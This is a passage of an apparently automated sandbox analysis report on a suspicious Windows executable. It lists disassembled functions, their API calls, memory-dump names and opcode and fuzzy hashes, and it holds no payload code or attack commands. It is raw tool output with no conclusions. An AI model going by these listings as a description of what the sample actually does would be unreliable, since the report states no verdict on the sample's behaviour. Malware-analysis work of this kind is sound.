                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                          • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                          • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                          Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                          Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                          • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                          Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction ID: 63114739b8f5e766059d8f14c8810c8407dd6dd2a261f9f87ac8566b0288577e
                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                          • Instruction Fuzzy Hash: F6E08632104259ABDF10AEA08C04EEB375CEB04350F044436F915E3140D230E9209BA4
                                                          Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                          Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                          Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                          • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                          • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                          Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                          • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                          • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                          Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                          Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                          • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                          • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                          Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                          • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                          • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                          • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                          • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

                                                          Non-executed Functions

                                                          Function 00404B6E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                          • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                          • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                          • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                          Function 00404635 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
